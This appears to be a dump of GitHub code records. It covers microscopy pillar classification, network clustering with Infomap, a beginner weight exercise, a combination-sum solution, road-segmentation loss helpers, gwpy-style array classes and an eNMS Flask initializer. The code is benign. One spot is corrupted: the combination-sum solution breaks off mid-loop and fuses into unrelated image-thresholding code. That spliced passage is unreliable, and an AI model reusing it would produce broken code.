numpy.linspace(rowBottomLeft,rowBottomRight,numPillarsInRow),\\\n # numpy.linspace(colBottomLeft,colBottomRight,numPillarsInRow)))\n \n # pillarID = 0\n # for coordTop,coordBottom in zip(topRowPillarCentre,bottomRowPillarCenter):\n # pillarColumnCoord = numpy.column_stack((numpy.linspace(coordTop[0],coordBottom[0],numPillarsInCol),numpy.linspace(coordTop[1],coordBottom[1],numPillarsInCol)))\n # for r,c in pillarColumnCoord:\n # cropRowStart,cropColStart = int(round(r-cropSize/2)),int(round(c-cropSize/2))\n # cropRowEnd,cropColEnd = int(cropRowStart+cropSize),int(cropColStart+cropSize)\n # if (cropRowStart>=0 and cropColStart>=0 and cropRowEnd<=row and cropColEnd<=col):\n # pillarID += 1\n # gImgCrop = gImg[cropRowStart:cropRowEnd+1,cropColStart:cropColEnd+1]\n # gImgCrop = cv2.resize(gImgCrop,(32,32),interpolation=cv2.INTER_AREA)\n \n # gImgCrop = gImgCrop.copy().astype('float32')\n # gImgCrop /= 255\n # gImgCrop = gImgCrop.reshape(1,32,32,1)\n # res = model.predict_classes(gImgCrop,batch_size=1)[0]\n # keras.backend.clear_session()\n # if (res==0):\n # gImgNorm = imageDraw.circle(gImgNorm,(r,c),radius=int(cropSize/4),thickness=12,color=255)\n # label = 'Collapse'\n # elif (res==1):\n # gImgNorm = imageDraw.circle(gImgNorm,(r,c),radius=int(cropSize/4),thickness=12,color=0)\n # label = 'Not collapse'\n # outFile.write('%s\\t%s\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%s\\n' %(inputFile,tag,pillarID,cropRowStart,cropColStart,cropRowEnd,cropColEnd,res,label))\n # cv2.imwrite(outputFile,gImgNorm)\n # del df,inputFile,colTopLeft,rowTopLeft,colTopRight,rowTopRight,colBottomRight,rowBottomRight,colBottomLeft,rowBottomLeft,numPillarsInRow,numPillarsInCol,cropSize,outputFile,tag,gImg,gImgNorm,row,col,topRowPillarCentre,bottomRowPillarCenter\n # gc.collect()\n # outFile.close()\n# del excelFileName,sheetNameList,model,sheetName\n# gc.collect()\n############################################################\n\n\n############################################################\n# MANUALLY FIX THE 
CLASSIFICATION DONE USING THE OLD ML MODEL\n# PREPARE A NEW TRAINING DATASET FOR CLASSIFICATION\n############################################################\nexcelFileName = 'classifyPillars.xlsx'\nsheetNameList = ['trainingData']\n\nfor sheetName in sheetNameList:\n print('Processing %s sheet' %(sheetName))\n df = pandas.read_excel(excelFileName,sheet_name=sheetName,names=['inputFile','colTopLeft','rowTopLeft','colTopRight','rowTopRight','colBottomRight','rowBottomRight','colBottomLeft','rowBottomLeft','numPillarsInRow','numPillarsInCol'],inplace=True)\n \n outFile = open('/home/utkarsh/Projects/PillarClassification/dataset/newLabelledDataset.dat','w')\n outFile.write('Label (Collapse=0, Not collapse=1)\\tImage array\\n')\n for inputFile,colTopLeft,rowTopLeft,colTopRight,rowTopRight,colBottomRight,rowBottomRight,colBottomLeft,rowBottomLeft,numPillarsInRow,numPillarsInCol in df.values:\n print('Processing %s' %(inputFile))\n if ('.dm3' in inputFile):\n pngFile = inputFile.replace('.dm3','.png')\n classifiedpngFile = inputFile.replace('.dm3','_manual.png')\n elif ('.dm4' in inputFile):\n pngFile = inputFile.replace('.dm4','.png')\n classifiedpngFile = inputFile.replace('.dm4','_manual.png') \n \n cropSize = int(round(max(2.0*0.75*(colTopRight-colTopLeft)/(numPillarsInRow-1),2.0*0.75*(rowBottomLeft-rowTopLeft)/(numPillarsInCol-1))))\n gImg = imageProcess.readDM4(inputFile)\n gImgClassified = cv2.imread(classifiedpngFile,0)\n [row,col] = gImg.shape\n \n topRowPillarCentre = numpy.column_stack((\\\n numpy.linspace(rowTopLeft,rowTopRight,numPillarsInRow),\\\n numpy.linspace(colTopLeft,colTopRight,numPillarsInRow)))\n bottomRowPillarCenter = numpy.column_stack((\\\n numpy.linspace(rowBottomLeft,rowBottomRight,numPillarsInRow),\\\n numpy.linspace(colBottomLeft,colBottomRight,numPillarsInRow)))\n \n for coordTop,coordBottom in zip(topRowPillarCentre,bottomRowPillarCenter):\n pillarColumnCoord = numpy.column_stack((numpy.linspace(coordTop[0],coordBottom[0],numPillarsInCol),numpy.linspace(coordTop[1],coordBottom[1],numPillarsInCol)))\n for r,c in pillarColumnCoord:\n cropRowStart,cropColStart = int(round(r-cropSize/2)),int(round(c-cropSize/2))\n cropRowEnd,cropColEnd = int(cropRowStart+cropSize),int(cropColStart+cropSize)\n if (cropRowStart>=0 and cropColStart>=0 and cropRowEnd<=row and cropColEnd<=col):\n gImgCrop = gImg[cropRowStart:cropRowEnd+1,cropColStart:cropColEnd+1]\n gImgCropClassified = gImgClassified[cropRowStart:cropRowEnd+1,cropColStart:cropColEnd+1]\n bImgCollapse = gImgCropClassified==255; bImgCollapse = imageProcess.removeBoundaryParticles(bImgCollapse)\n bImgNotCollapse = gImgCropClassified==0; bImgNotCollapse = imageProcess.removeBoundaryParticles(bImgNotCollapse)\n bImgCollapseSum,bImgNotCollapseSum = numpy.sum(bImgCollapse),numpy.sum(bImgNotCollapse)\n if (bImgCollapseSum > bImgNotCollapseSum):\n outFile.write('0\\t')\n else:\n outFile.write('1\\t')\n gImgCrop = cv2.resize(gImgCrop,(64,64),interpolation=cv2.INTER_LINEAR)\n for pixel in gImgCrop.flatten()[:-1]:\n outFile.write('%d\\t' %(pixel))\n outFile.write('%d\\n' %(gImgCrop.flatten()[-1]))\n outFile.close()\ndel excelFileName,sheetNameList,sheetName\ngc.collect()\n############################################################\n","repo_name":"uanand/PillarClassification","sub_path":"main/prepareNewTrainingDataset.py","file_name":"prepareNewTrainingDataset.py","file_ext":"py","file_size_in_byte":8391,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} 
+{"seq_id":"18774802402","text":"\"\"\"\nAuthor: Nolan K Newman \nLast updated: 7/19/23\n\nWritten/tested in Python v3.8.10\n\nDescription:\nTakes a network and uses Infomap to assign cluster numbers. Infomap clustering is performed for each data type in the network.\n\n\"\"\"\n\nimport pickle\nimport argparse\nimport networkx as nx\nfrom infomap import Infomap\nimport csv\nimport collections\nimport os\n \nif __name__ == '__main__':\n\n def import_outside_nw(fname):\n '''\n Function to import the network into script if network was reconstructed via alternative methods other than TkNA\n \n Arguments:\n - fname: the name of the file\n '''\n row_count = 0 \n G = nx.Graph()\n \n with open(fname) as csvfile: \n file = csv.reader(csvfile, delimiter = ',')\n \n for row in file:\n \n #print(row)\n \n # Take the index of the source and target node in the header of the file\n if row_count == 0: \n p1 = int(row.index(\"partner1\"))\n \n p2 = int(row.index(\"partner2\"))\n \n parameter1 = row[p1]\n parameter2 = row[p2] \n \n # Find each node that made it into the final network and the direction of the edge \n if row_count != 0:\n G.add_edge(parameter1, parameter2)\n \n row_count += 1\n \n csvfile.close() \n return(G)\n \n # Function that takes as input the mapping file from the user and creates a dictionary of the type for each node. Then, for the nodes that are in the network input file, it assigns types to them based on the typing from the mapping file. \n def assign_node_type(node_list_file): \n '''\n Function that takes as input the mapping file from the user and creates a dictionary of the type for each node. Then, for the nodes that are in the network input file, it assigns types to them based on the typing from the mapping file. \n \n Arguments:\n - node_list_file: the mapping file supplied by the user\n '''\n \n node_type_dict = collections.defaultdict(list)\n\n # Add all node-type pairs from the input file into the node_type_dict\n with open(node_list_file) as node_file:\n node_file = csv.reader(node_file, delimiter = ',')\n \n for row in node_file:\n node_type_dict[row[1]].append(row[0])\n \n return(node_type_dict)\n \n\n def infomap_partition(G, type_dict, subnw):\n '''\n Assigns nodes to subnetworks within user-defined subnetworks \n \n Arguments:\n - G: the entire network\n - type_dict: dictionary that includes the node names as keys and the user-defined subnetwork as values\n - subnw: the user-defined subnetwork that is currently being analyzed\n '''\n im = Infomap()\n # make node-to-int and int-to-node dictionaries\n \n # Extract just the nodes from the subnetwork being analyzed\n subnw_nodes = type_dict[subnw] \n subnw_graph = nx.subgraph(G, subnw_nodes)\n \n j = 0\n node_to_int = {}\n int_to_node = {}\n for n in subnw_graph.nodes():\n node_to_int[n] = j\n int_to_node[j] = n\n j += 1\n \n # copy the edges into InfoMap\n for e in subnw_graph.edges():\n im.add_link(node_to_int[e[0]],node_to_int[e[1]])\n \n # now run in silent mode\n #options_string = '--silent --preferred-number-of-modules '+str(n_mod)\n options_string = '--silent'\n im.run(options_string)\n \n # set up the node->community id dictionary\n partition = {}\n for node in im.tree:\n if node.is_leaf:\n partition[int_to_node[node.node_id]] = node.module_id - 1\n return im.codelength,partition\n \n \n parser = argparse.ArgumentParser(description=\"Example command: python ./analysis/infomap_assignment.py --network --network-format --map --out-dir \", add_help=False)\n\n requiredArgGroup = parser.add_argument_group('Required 
arguments')    \n    requiredArgGroup.add_argument(\"--network\", type=str, help=\"The path to the network file, either in .pickle or .csv format; see --network-format\", required=True)\n    requiredArgGroup.add_argument(\"--network-format\", type=str, dest=\"network_format\", choices=['pickle', 'csv'], help=\"Format of the network file; Either use 'pickle' with the network.pickle file output made by assess_network.py (if network was reconstructed using the TkNA pipeline) or 'csv' if the network was reconstructed using an alternative pipeline (must be in .csv format and have 'partner1' and 'partner2' as the headers for the two node columns)\", required=True)\n    requiredArgGroup.add_argument(\"--map\", help = 'CSV file with the name of the node in the first column and its data type in the second column (i.e. ENSMUSG00000030708, gene).', required=True)\n    requiredArgGroup.add_argument(\"--out-dir\", type=str, dest = \"outdir\", help=\"Path to output directory\", required=True)\n\n    optionalArgGroup  = parser.add_argument_group('Optional arguments')  \n    optionalArgGroup.add_argument(\"-h\", \"--help\", action=\"help\", help=\"Show this help message and exit\")\n    \n    args = parser.parse_args()\n    outdir = args.outdir\n    \n    if not outdir[-1] == \"/\":\n        outdir = outdir + \"/\"\n    \n    if not os.path.exists(outdir):\n        os.makedirs(outdir)    \n    \n    #Main driver of the code\n    \n    # Load in the network\n    if args.network_format == 'pickle':\n        # Unpack the pickle\n        p = open(args.network, \"rb\")\n        p = pickle.load(p)\n        G = p\n        \n        network_name = args.network.split(\"/\")[-1]\n        network_name = network_name[:-7] # remove the pickle extension from file name  \n        \n    elif args.network_format == 'csv':\n        G = import_outside_nw(args.network)\n        \n        network_name = args.network.split(\"/\")[-1]  \n        network_name = network_name[:-4] # remove the csv extension from file name  \n\n    # Assign each node a node type so infomap is run separately on each type\n    node_type_dict = assign_node_type(args.map)\n\n    # dict of infomap outputs, keyed on subnetwork name and values are list of infomap_partition results\n    im_outputs = {}\n\n    with open(outdir + network_name + \"_infomap_partition.csv\", \"w\") as file:\n        file.write(\"Node,Subnetwork_partition\\n\")\n        \n        for subnet in node_type_dict.keys():\n            print(\"Performing infomap in the \" + subnet + \" subnetwork...\")\n            im_outputs[subnet] = infomap_partition(G, node_type_dict, subnet)\n            [file.write(str(k) + \",\" + subnet + \"_\" + str(v) + \"\\n\") for k,v in im_outputs[subnet][1].items()]\n    file.close()  \n    \n    print(\"\\nFile saved: \" + outdir + network_name + \"_infomap_partition.csv\\n\")  \n    \n\n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n","repo_name":"CAnBioNet/TkNA","sub_path":"analysis/infomap_assignment.py","file_name":"infomap_assignment.py","file_ext":"py","file_size_in_byte":7244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"42431838105","text":"#A toy store is very successful with two of its products: clowns and dolls. \n#It usually sells by mail order, and the logistics company charges by the weight of\n#each package, so the store must calculate the weight of the clowns and dolls that will\n#go in each package on demand. Each clown weighs 112 g and each doll weighs 75 g. 
\n#Write a program that reads the number of clowns and dolls sold in the last \n#order and calculates the total weight of the package to be shipped.\n\n#grams\npesopay=112\npesomuñeca=75\nprint(\"\\nLogistics\\n\")\npay=int(input(\"Enter the number of clowns sold\"))\nmuñecas=int(input(\"Enter the number of dolls sold\"))\npeso=(pay*pesopay)+(muñecas*pesomuñeca)\nif peso>=1000:\n    kg=peso/1000\n    #g=peso%1000\n    print(f\"You are sending {pay} clowns and {muñecas} dolls.\\nThe total weight of the order is: {kg} kg.\")\nelse:\n    print(f\"You are sending {pay} clowns and {muñecas} dolls.\\nThe total weight of the order is: {peso} g.\")\n    \n\n\n","repo_name":"MauricioMunguia10/EjerciciosPython","sub_path":"TiposdeDatos/ejercicio10.py","file_name":"ejercicio10.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5209049010","text":"class Solution:\n    \"\"\"\n    @param: num: Given the candidate numbers\n    @param: target: Given the target number\n    @return: All the combinations that sum to target\n    \"\"\"\n    def combinationSum2(self, num, target):\n        # write your code here\n        num.sort()\n        self.res=[]\n        self.dfs(num,[],target,0)\n        return self.res\n    def dfs(self,num,curr,target,start):\n        if target==0:\n            self.res.append(curr)\n        if target<=0:\n            return\n        n=len(num)\n        i=start\n        while i self.level*255] = 255\n        np_img[np_img <= self.level*255] = 0\n\n        img = Image.fromarray(np_img, 'L')\n\n        return img\n\nclass WeightedBCELoss(torch.nn.BCELoss):\n    def __init__(self, class_weights=None): # does not support weight, size_average, reduce, reduction\n        super().__init__(reduction='none')\n        if class_weights is None:\n            class_weights = torch.ones(2)\n        self.class_weights = torch.as_tensor(class_weights)\n\n    def forward(self, input, target):\n        raw_loss = super().forward(input, target)\n        class_weights = self.class_weights.to(input.device)\n        weight_matrix = class_weights[0]*(1-target) + class_weights[1]*target\n        loss = weight_matrix * raw_loss\n        loss = loss.mean() # reduction='elementwise_mean'\n        return loss\n\n\ndef compute_class_weights(imgs):\n    mask_transform = transforms.Compose([\n        GrayscaleAndThreshold(),\n        transforms.ToTensor()\n    ])\n\n    road_pxs = 0\n    bg_pxs = 0\n    for img in imgs:\n        img = Image.fromarray(np.uint8(img*255))\n        mask_tr = torch.squeeze(mask_transform(img)).numpy().astype(int)\n        road_pxs += mask_tr.sum()\n        bg_pxs += (1 - mask_tr).sum()\n\n    bg_px_weight = (road_pxs + bg_pxs) / (2 * bg_pxs) # \"class 0\"\n    road_px_weight = (road_pxs + bg_pxs) / (2 * road_pxs) # \"class 1\"\n\n    return bg_px_weight, road_px_weight\n","repo_name":"Minauras/road-segmentation","sub_path":"ResNet/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"19528371020","text":"__version__ = 'Testing 0.0.1'\n\nimport numpy\nimport warnings\n\nfrom astropy.units import (Unit, Quantity)\n\nfrom constantQ.utilityaccess import if_not_none\nfrom constantQ.index import Index\nfrom constantQ.segments import Segment\n\n################### Array ###################\nclass Array(Quantity):\n    \"\"\"Array holding data with a unit, and other metadata\n    Array([ 1., 2., 3., 4., 5.]\n          unit: Unit(\"m / s\"),\n          name: 'my data',\n          epoch: None,\n          channel: None)\n    https://github.com/gwpy/gwpy/blob/v2.0.4/gwpy/types/array.py\n    \"\"\"\n\n    _metadata_slots = ('name', 'epoch', 'channel')\n\n    def __new__(cls, value, 
unit=None, # Quantity attrs\n name=None, epoch=None, channel=None, # new attrs\n dtype=None, copy=True, subok=True, # ndarray attrs\n order=None, ndmin=0):\n \"\"\"Create a new `Array`\n \"\"\"\n # pick dtype from input array\n if dtype is None and isinstance(value, numpy.ndarray):\n dtype = value.dtype\n\n # create new array\n new = super().__new__(cls, value, unit=unit, dtype=dtype, copy=False,\n order=order, subok=subok, ndmin=ndmin)\n\n # explicitly copy here to get ownership of the data,\n # see (astropy/astropy#7244)\n if copy:\n new = new.copy()\n\n # set new attributes\n if name is not None:\n new.name = name\n if epoch is not None:\n new.epoch = epoch\n if channel is not None:\n new.channel = channel\n\n return new\n\n def __array_finalize__(self, obj):\n # format a new instance of this class starting from `obj`\n if obj is None:\n return\n\n # call Quantity.__array_finalize__ to handle the units\n super().__array_finalize__(obj)\n\n # then update metadata\n if isinstance(obj, Quantity):\n self.__metadata_finalize__(obj, force=False)\n\n def __metadata_finalize__(self, obj, force=False):\n # apply metadata from obj to self if creating a new object\n for attr in self._metadata_slots:\n _attr = '_%s' % attr # use private attribute (not property)\n # if attribute is unset, default it to None, then update\n # from obj if desired\n try:\n getattr(self, _attr)\n except AttributeError:\n update = True\n else:\n update = force\n if update:\n try:\n val = getattr(obj, _attr)\n except AttributeError:\n continue\n else:\n if isinstance(val, Quantity): # copy Quantities\n setattr(self, _attr, type(val)(val))\n else:\n setattr(self, _attr, val)\n\n def _repr_helper(self, print_):\n if print_ is repr:\n opstr = '='\n else:\n opstr = ': '\n\n # get prefix and suffix\n prefix = '{}('.format(type(self).__name__)\n suffix = ')'\n if print_ is repr:\n prefix = '<{}'.format(prefix)\n suffix += '>'\n\n indent = ' ' * len(prefix)\n\n # format value\n arrstr = numpy.array2string(self.view(numpy.ndarray), separator=', ',\n prefix=prefix)\n\n # format unit\n metadata = [('unit', print_(self.unit) or 'dimensionless')]\n\n # format other metadata\n try:\n attrs = self._print_slots\n except AttributeError:\n attrs = self._metadata_slots\n for key in attrs:\n try:\n val = getattr(self, key)\n except (AttributeError, KeyError):\n val = None\n thisindent = indent + ' ' * (len(key) + len(opstr))\n metadata.append((\n key.lstrip('_'),\n print_(val).replace('\\n', '\\n{}'.format(thisindent)),\n ))\n metadata = (',\\n{}'.format(indent)).join(\n '{0}{1}{2}'.format(key, opstr, value) for key, value in metadata)\n\n return \"{0}{1}\\n{2}{3}{4}\".format(\n prefix, arrstr, indent, metadata, suffix)\n\n def __repr__(self):\n \"\"\"Return a representation of this object\n This just represents each of the metadata objects appropriately\n after the core data array\n \"\"\"\n return self._repr_helper(repr)\n\n def __str__(self):\n \"\"\"Return a printable string format representation of this object\n This just prints each of the metadata objects appropriately\n after the core data array\n \"\"\"\n return self._repr_helper(str)\n\n # name \n @property\n def name(self):\n \"\"\"Name for this data set\n \"\"\"\n try:\n return self._name\n except AttributeError:\n self._name = None\n return self._name\n \n @name.setter\n def name(self, val):\n self._name = if_not_none(str, val) \n\n @name.deleter\n def name(self):\n try:\n del self._name\n except AttributeError:\n pass\n\n def abs(self, axis=None, **kwargs):\n return 
self._wrap_function(numpy.abs, axis, **kwargs)\n abs.__doc__ = numpy.abs.__doc__\n\n def median(self, axis=None, **kwargs):\n return self._wrap_function(numpy.median, axis, **kwargs)\n median.__doc__ = numpy.median.__doc__\n\n################### Series ###################\nclass Series(Array):\n \"\"\"A one-dimensional data series\n Series([ 1., 2., 3., 2., 4., 3.]\n unit: Unit(\"nm\"),\n name: None,\n epoch: None,\n channel: None,\n x0: 0.0 W,\n dx: 2.0 W,\n xindex: [ 0. 2. 4. 6. 8. 10.] W)\n https://github.com/gwpy/gwpy/blob/v2.0.4/gwpy/types/series.py\n \"\"\"\n _metadata_slots = Array._metadata_slots + ('x0', 'dx', 'xindex')\n _default_xunit = Unit('')\n _ndim = 1\n\n def __new__(cls, value, unit=None, x0=None, dx=None, xindex=None,\n xunit=None, **kwargs):\n # check input data dimensions are OK\n shape = numpy.shape(value)\n if len(shape) != cls._ndim:\n raise ValueError(\"Cannot generate %s with %d-dimensional data\"\n % (cls.__name__, len(shape)))\n\n # create new object\n new = super().__new__(cls, value, unit=unit, **kwargs)\n\n # set x-axis metadata from xindex\n if xindex is not None:\n # warn about duplicate settings\n if dx is not None:\n warnings.warn(\"xindex was given to %s(), dx will be ignored\"\n % cls.__name__)\n if x0 is not None:\n warnings.warn(\"xindex was given to %s(), x0 will be ignored\"\n % cls.__name__)\n # get unit\n if xunit is None and isinstance(xindex, Quantity):\n xunit = xindex.unit\n elif xunit is None:\n xunit = cls._default_xunit\n new.xindex = Quantity(xindex, unit=xunit)\n # or from x0 and dx\n else:\n if xunit is None and isinstance(dx, Quantity):\n xunit = dx.unit\n elif xunit is None and isinstance(x0, Quantity):\n xunit = x0.unit\n elif xunit is None:\n xunit = cls._default_xunit\n if dx is not None:\n new.dx = Quantity(dx, xunit)\n if x0 is not None:\n new.x0 = Quantity(x0, xunit)\n return new\n\n # -- series properties ----------------------\n\n def _update_index(self, axis, key, value):\n \"\"\"Update the current axis index based on a given key or value\n This is an internal method designed to set the origin or step for\n an index, whilst updating existing Index arrays as appropriate\n Examples\n --------\n >>> self._update_index(\"x0\", 0)\n >>> self._update_index(\"dx\", 0)\n To actually set an index array, use `_set_index`\n \"\"\"\n # delete current value if given None\n if value is None:\n return delattr(self, key)\n\n _key = \"_{}\".format(key)\n index = \"{[0]}index\".format(axis)\n unit = \"{[0]}unit\".format(axis)\n\n # convert float to Quantity\n if not isinstance(value, Quantity):\n try:\n value = Quantity(value, getattr(self, unit))\n except TypeError:\n value = Quantity(float(value), getattr(self, unit))\n\n # if value is changing, delete current index\n try:\n curr = getattr(self, _key)\n except AttributeError:\n delattr(self, index)\n else:\n if (\n value is None\n or getattr(self, key) is None\n or not value.unit.is_equivalent(curr.unit)\n or value != curr\n ):\n delattr(self, index)\n\n # set new value\n setattr(self, _key, value)\n return value\n\n def _set_index(self, key, index):\n \"\"\"Set a new index array for this series\n \"\"\"\n axis = key[0]\n origin = \"{}0\".format(axis)\n delta = \"d{}\".format(axis)\n if index is None:\n return delattr(self, key)\n if not isinstance(index, Index):\n try:\n unit = index.unit\n except AttributeError:\n unit = getattr(self, \"_default_{}unit\".format(axis))\n index = Index(index, unit=unit, copy=False)\n setattr(self, origin, index[0])\n if index.regular:\n setattr(self, delta, 
index[1] - index[0])\n else:\n delattr(self, delta)\n setattr(self, \"_{}\".format(key), index)\n\n def _index_span(self, axis):\n\n axisidx = (\"x\", \"y\", \"z\").index(axis)\n unit = getattr(self, \"{}unit\".format(axis))\n try:\n delta = getattr(self, \"d{}\".format(axis)).to(unit).value\n except AttributeError: # irregular xindex\n index = getattr(self, \"{}index\".format(axis))\n try:\n delta = index.value[-1] - index.value[-2]\n except IndexError:\n raise ValueError(\"Cannot determine x-axis stride (dx)\"\n \"from a single data point\")\n return Segment(index.value[0], index.value[-1] + delta)\n else:\n origin = getattr(self, \"{}0\".format(axis)).to(unit).value\n return Segment(origin, origin + self.shape[axisidx] * delta)\n\n # x0\n @property\n def x0(self):\n \"\"\"X-axis coordinate of the first data point\n :type: `~astropy.units.Quantity` scalar\n \"\"\"\n try:\n return self._x0\n except AttributeError:\n self._x0 = Quantity(0, self.xunit)\n return self._x0\n\n @x0.setter\n def x0(self, value):\n self._update_index(\"x\", \"x0\", value)\n\n @x0.deleter\n def x0(self):\n try:\n del self._x0\n except AttributeError:\n pass\n\n # dx\n @property\n def dx(self):\n \"\"\"X-axis sample separation\n :type: `~astropy.units.Quantity` scalar\n \"\"\"\n try:\n return self._dx\n except AttributeError:\n try:\n self._xindex\n except AttributeError:\n self._dx = Quantity(1, self.xunit)\n else:\n if not self.xindex.regular:\n raise AttributeError(\"This series has an irregular x-axis \"\n \"index, so 'dx' is not well defined\")\n self._dx = self.xindex[1] - self.xindex[0]\n return self._dx\n\n @dx.setter\n def dx(self, value):\n self._update_index(\"x\", \"dx\", value)\n\n @dx.deleter\n def dx(self):\n try:\n del self._dx\n except AttributeError:\n pass\n\n # xindex\n @property\n def xindex(self):\n \"\"\"Positions of the data on the x-axis\n :type: `~astropy.units.Quantity` array\n \"\"\"\n try:\n return self._xindex\n except AttributeError:\n self._xindex = Index.define(self.x0, self.dx, self.shape[0])\n return self._xindex\n\n @xindex.setter\n def xindex(self, index):\n self._set_index(\"xindex\", index)\n\n @xindex.deleter\n def xindex(self):\n try:\n del self._xindex\n except AttributeError:\n pass\n\n # xunit\n @property\n def xunit(self):\n \"\"\"Unit of x-axis index\n :type: `~astropy.units.Unit`\n \"\"\"\n try:\n return self._dx.unit\n except AttributeError:\n try:\n return self._x0.unit\n except AttributeError:\n return self._default_xunit\n\n @xunit.setter\n def xunit(self, unit):\n unit = Unit(unit)\n try: # set the index, if present\n self.xindex = self._xindex.to(unit)\n except AttributeError: # or just set the start and step\n self.dx = self.dx.to(unit)\n self.x0 = self.x0.to(unit)\n\n @property\n def xspan(self):\n \"\"\"X-axis [low, high) segment encompassed by these data\n :type: `~gwpy.segments.Segment`\n \"\"\"\n return self._index_span(\"x\")\n\n\n################### Array2D ###################\nclass Array2D(Series):\n \"\"\"A two-dimensional array with metadata\n \"\"\"\n _metadata_slots = Series._metadata_slots + ('y0', 'dy', 'yindex')\n _default_xunit = Unit('')\n _default_yunit = Unit('')\n _rowclass = Series\n _columnclass = Series\n _ndim = 2\n\n def __new__(cls, data, unit=None,\n x0=None, dx=None, xindex=None, xunit=None,\n y0=None, dy=None, yindex=None, yunit=None, **kwargs):\n \"\"\"Define a new `Array2D`\n \"\"\"\n\n # create new object\n new = super().__new__(cls, data, unit=unit, xindex=xindex,\n xunit=xunit, x0=x0, dx=dx, **kwargs)\n\n # set y-axis metadata 
from yindex\n if yindex is not None:\n # warn about duplicate settings\n if dy is not None:\n warnings.warn(\"yindex was given to %s(), dy will be ignored\"\n % cls.__name__)\n if y0 is not None:\n warnings.warn(\"yindex was given to %s(), y0 will be ignored\"\n % cls.__name__)\n # get unit\n if yunit is None and isinstance(yindex, Quantity):\n yunit = yindex.unit\n elif yunit is None:\n yunit = cls._default_yunit\n new.yindex = Quantity(yindex, unit=yunit)\n # or from y0 and dy\n else:\n if yunit is None and isinstance(dy, Quantity):\n yunit = dy.unit\n elif yunit is None and isinstance(y0, Quantity):\n yunit = y0.unit\n elif yunit is None:\n yunit = cls._default_yunit\n if dy is not None:\n new.dy = Quantity(dy, yunit)\n if y0 is not None:\n new.y0 = Quantity(y0, yunit)\n\n return new\n\n # -- Array2d properties ---------------------\n\n # y0\n @property\n def y0(self):\n \"\"\"Y-axis coordinate of the first data point\n :type: `~astropy.units.Quantity` scalar\n \"\"\"\n try:\n return self._y0\n except AttributeError:\n self._y0 = Quantity(0, self.yunit)\n return self._y0\n\n @y0.setter\n def y0(self, value):\n self._update_index(\"y\", \"y0\", value)\n\n @y0.deleter\n def y0(self):\n try:\n del self._y0\n except AttributeError:\n pass\n\n # dy\n @property\n def dy(self):\n \"\"\"Y-axis sample separation\n :type: `~astropy.units.Quantity` scalar\n \"\"\"\n try:\n return self._dy\n except AttributeError:\n try:\n self._yindex\n except AttributeError:\n self._dy = Quantity(1, self.yunit)\n else:\n if not self.yindex.regular:\n raise AttributeError(\n \"This series has an irregular y-axis \"\n \"index, so 'dy' is not well defined\")\n self._dy = self.yindex[1] - self.yindex[0]\n return self._dy\n\n @dy.setter\n def dy(self, value):\n self._update_index(\"y\", \"dy\", value)\n\n @dy.deleter\n def dy(self):\n try:\n del self._dy\n except AttributeError:\n pass\n\n @property\n def yunit(self):\n \"\"\"Unit of Y-axis index\n :type: `~astropy.units.Unit`\n \"\"\"\n try:\n return self._dy.unit\n except AttributeError:\n try:\n return self._y0.unit\n except AttributeError:\n return self._default_yunit\n\n # yindex\n @property\n def yindex(self):\n \"\"\"Positions of the data on the y-axis\n :type: `~astropy.units.Quantity` array\n \"\"\"\n try:\n return self._yindex\n except AttributeError:\n self._yindex = Index.define(self.y0, self.dy, self.shape[1])\n return self._yindex\n\n @yindex.setter\n def yindex(self, index):\n self._set_index(\"yindex\", index)\n\n @yindex.deleter\n def yindex(self):\n try:\n del self._yindex\n except AttributeError:\n pass\n\n @property\n def yspan(self):\n \"\"\"Y-axis [low, high) segment encompassed by these data\n :type: `~gwpy.segments.Segment`\n \"\"\"\n return self._index_span(\"y\")\n\n @property\n def T(self):\n trans = self.value.T.view(type(self))\n trans.__array_finalize__(self)\n if hasattr(self, '_xindex'):\n trans.yindex = self.xindex.view()\n else:\n trans.y0 = self.x0\n trans.dy = self.dx\n if hasattr(self, '_yindex'):\n trans.xindex = self.yindex.view()\n else:\n trans.x0 = self.y0\n trans.dx = self.dy\n return trans","repo_name":"xli2522/Constant-Q","sub_path":"constantQ/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":18144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17295404709","text":"from flask import Flask, render_template\nfrom flask_apscheduler import APScheduler\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask_login import LoginManager\nfrom 
flask_mail import Mail\nfrom flask_sqlalchemy import SQLAlchemy\nfrom hvac import Client as VaultClient\nfrom importlib import import_module\nfrom logging import basicConfig, DEBUG, info, StreamHandler\nfrom logging.handlers import RotatingFileHandler\nfrom eNMS.contrib.themes import apply_themes\nfrom os import environ\n\nauth = HTTPBasicAuth()\ndb = SQLAlchemy(\n session_options={\n 'expire_on_commit': False,\n 'autoflush': False\n }\n)\nlogin_manager = LoginManager()\nmail = Mail()\nscheduler = APScheduler()\n\n# Vault\nuse_vault = int(environ.get('USE_VAULT', False))\nvault_client = VaultClient()\n\nfrom eNMS.base.default import (\n create_default_services,\n create_default_parameters,\n create_default_pools,\n create_default_users,\n create_default_examples\n)\nfrom eNMS.base.helpers import fetch\nfrom eNMS.base.rest import configure_rest_api\n\n\ndef register_extensions(app):\n db.init_app(app)\n login_manager.init_app(app)\n mail.init_app(app)\n if not scheduler.running:\n scheduler.init_app(app)\n scheduler.start()\n\n\ndef register_blueprints(app):\n blueprints = (\n 'admin',\n 'automation',\n 'base',\n 'logs',\n 'objects',\n 'scheduling',\n 'views',\n 'provisioning'\n )\n for blueprint in blueprints:\n module = import_module(f'eNMS.{blueprint}')\n app.register_blueprint(module.bp)\n\n\ndef configure_login_manager(app):\n @login_manager.user_loader\n def user_loader(id):\n return fetch('User', id=id)\n\n @login_manager.request_loader\n def request_loader(request):\n return fetch('User', name=request.form.get('name'))\n\n\ndef configure_vault_client(app):\n vault_client.url = app.config['VAULT_ADDR']\n vault_client.token = app.config['VAULT_TOKEN']\n if vault_client.sys.is_sealed() and app.config['UNSEAL_VAULT']:\n keys = 